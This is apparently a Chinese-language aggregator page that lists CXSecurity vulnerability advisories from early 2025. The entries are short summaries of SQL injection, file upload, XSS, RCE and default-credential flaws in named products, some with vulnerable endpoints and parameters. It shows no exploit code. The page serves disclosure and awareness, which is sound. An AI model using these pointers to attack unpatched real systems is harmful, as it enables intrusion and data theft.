Firefox 135.0.1 bypass Download protections (PoC) 文章描述了如何通过HTML和PHP代码在Firefox 135.0.1版本中绕过下载保护机制，实现强制或隐秘下载文件的功能，并可能导致循环下载填充默认下载文件夹。... 2025-2-28 16:53:47 | 阅读: 3 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com download php fldf fldr brw

Library-Card-System V 1.0 | Add Picture/Signature - signup.php | Unrestricted File Upload | Found By Maloy Roy Orko Library-Card-System V1.0中signup.php存在无限制文件上传漏洞，允许远程攻击者上传恶意脚本并劫持服务器。... 2025-2-27 17:30:51 | 阅读: 5 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com library php signup needyamin

Needyamin | Library-Card-System 1.0 | card.php?id= SQL Injection | Found By Maloy Roy Orko Library-Card-System 1.0 存在 SQL 注入漏洞，在 `card.php?id=` 参数处未受保护，允许远程攻击者通过输入恶意参数dump数据库。... 2025-2-27 17:30:37 | 阅读: 6 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com needyamin library injection database

needyamin Library Card System Registration Page signup.php cross site scripting Library-Card-System 1.0 存在存储型跨站脚本漏洞， signup.php 中的用户输入未验证或清理，允许远程攻击者通过注册携带 XSS 有效载荷，在 admindashboard.php 和 card.php 中执行恶意脚本。... 2025-2-24 21:1:13 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com php library signup needyamin maloy

Image_Gallery | Add Gallery- admin/gallery.php | Unrestricted File Upload | Found By Maloy Roy Orko needyamin image_gallery 1.0 存在关键漏洞，影响 Cover Image Handler 组件。通过操纵 image 参数可实现任意文件上传。该漏洞已公开披露，但厂商未回应修复请求。... 2025-2-24 21:0:42 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com gallery classified needyamin php initiated

Image_Gallery | view.php?username= | Cross Site Scripting (Reflected XSS) | Found By Maloy Roy Orko Image_Gallery应用中的view.php?username=参数存在反射型XSS漏洞，由Maloy Roy Orko发现。攻击者可注入恶意脚本窃取管理员cookie并控制服务器。... 2025-2-24 21:0:26 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com username php gallery needyamin roy

Library-Card-System | SQL Injection Admin Login Bypass In admin.php | Found By Maloy Roy Orko Maloy Roy Orko发现Library-Card-System 1.0的admin.php存在SQL注入漏洞，允许攻击者绕过管理员登录检查并进入后台面板。... 2025-2-24 21:0:1 | 阅读: 5 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com library php bypass injection needyamin

Zabbix SQL Multiple Vulns 本文介绍了一个针对Zabbix服务器的SQL注入漏洞（CVE-2024-42327），通过该漏洞可泄露管理员API认证令牌并创建反向shell以实现远程控制。... 2025-2-19 22:11:39 | 阅读: 10 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com payload proxies endc jsonrpc username

InvokeAI Remote Code Execution 该文章描述了一个针对InvokeAI平台的远程代码执行（RCE）漏洞（CVE-2024-12029），该漏洞存在于`/api/v2/models/install`接口中。攻击者可通过上传恶意模型文件触发服务器端反序列化漏洞，从而在目标服务器上执行任意代码。此漏洞影响InvokeAI版本4.0.0至5.4.2，并已被Metasploit框架集成模块进行利用。... 2025-2-19 22:8:44 | 阅读: 21 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com remote invokeai payload httpdelay stance

BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution 这篇文章描述了一个针对BeyondTrust Privileged Remote Access (PRA)和Remote Support (RS)的未认证远程代码执行漏洞（影响版本24.3.1及以下），利用了CVE-2024-12356（参数注入）和CVE-2025-1094（PostgreSQL SQL注入）。该漏洞允许攻击者通过WebSocket协议在目标系统上执行任意代码，并提供了Metasploit模块实现利用。... 2025-2-19 22:7:40 | 阅读: 6 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com remote 12356 download client connector

WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download WordPress插件A/B Image Optimizer 3.3及以下版本存在目录遍历漏洞，允许订阅者及以上权限用户下载任意文件，可能导致敏感信息泄露。CVSS评分为6.5。... 2025-2-18 22:26:50 | 阅读: 16 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com wp optimizer 65534 wordpress uucp

OpenSSH 9.9p1 Denial of Service / Man-In-The-Middle OpenSSH 9.9p1 存在两个漏洞：一是当 VerifyHostKeyDNS 启用时，攻击者可伪造服务器身份；二是内存和 CPU 的消耗导致拒绝服务攻击。这两个漏洞分别由历史代码问题和新增功能引入。... 2025-2-18 22:25:39 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com ssh client openssh sshkey sshbuf

ABB Cylon FLXeon 9.3.4 Default Credentials ABB Cylon FLXeon 9.3.4默认凭据存在安全漏洞。该设备用于楼宇自动化系统，支持BACnet/IP协议，默认管理凭据强度弱，易被远程攻击者猜测并完全控制设备。... 2025-2-13 21:10:23 | 阅读: 6 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com abb bacnet flxeon cylon zsl

Wattsense Bridge 6.x Remote Root / Information Disclosure Wattsense Bridge 6.x版本存在四个高危漏洞（CVE-2025-26408至26411），包括JTAG访问、串口登录、弱密码及插件上传等，可导致远程根权限获取或设备操控。建议用户立即更新至修复版本（如6.4.1及以上），并进行全面安全审查。... 2025-2-13 21:9:28 | 阅读: 53 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com wattsense attacker bootloader firmware security

SolarView Compact 6.00 - Command Injection 这篇文章介绍了SolarView Compact 6.00版本中存在的命令注入漏洞。攻击者可通过构造恶意请求实现远程命令执行，并绕过身份验证。该漏洞影响Windows、Linux和Android（Termux）环境。... 2025-2-13 21:7:55 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com injection solarview php solar attacker

ABB Cylon FLXeon 9.3.4 (serialConfig.js) JSON Object Flooding DoS ABB Cylon FLXeon 9.3.4版本中存在一个JSON对象洪水攻击漏洞，影响多个系列控制器。攻击者可通过构造特定请求利用该漏洞引发内存和CPU资源耗尽，导致拒绝服务（DoS）。此漏洞由Gjoko Krstic发现。... 2025-2-10 20:10:43 | 阅读: 4 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com abb bacnet flxeon newports

MySchool 1.0 SQL Injection / Code Injection / XSS / CSRF MySchool 1.0 SQL Injection / Code Injection / XSS / CSRF@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@... 2025-2-1 09:40:45 | 阅读: 14 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com php myschool injection forgot

Quorum onQ OS 6.0.0.5.2064 Cross Site Scripting Quorum onQ OS 6.0.0.5.2064 Cross Site Scripting[+] Credits: Shahnawaz Shaikh, Security Researcher... 2025-2-1 09:39:16 | 阅读: 11 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com quorum 2064 onq attacker ux

Xinet Elegant 6 Asset Lib Web UI 6.1.655 / SQL Injection / Exploit Update Xinet Elegant 6 Asset Lib Web UI 6.1.655 / SQL Injection / Exploit UpdateCVSS Base Score: 7.5/1... 2025-2-1 09:37:10 | 阅读: 9 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com injects elegant loginform injection napc

OpenPanel 0.3.4 Command Injection OpenPanel 0.3.4 Command Injection# Exploit Title: OpenPanel 0.3.4 - OS Command Injection via The T... 2025-1-29 22:13:13 | 阅读: 9 | 收藏 | CXSECURITY Database RSS Feed - CXSecurity.com - cxsecurity.com openpanel timezone 2083 injection ux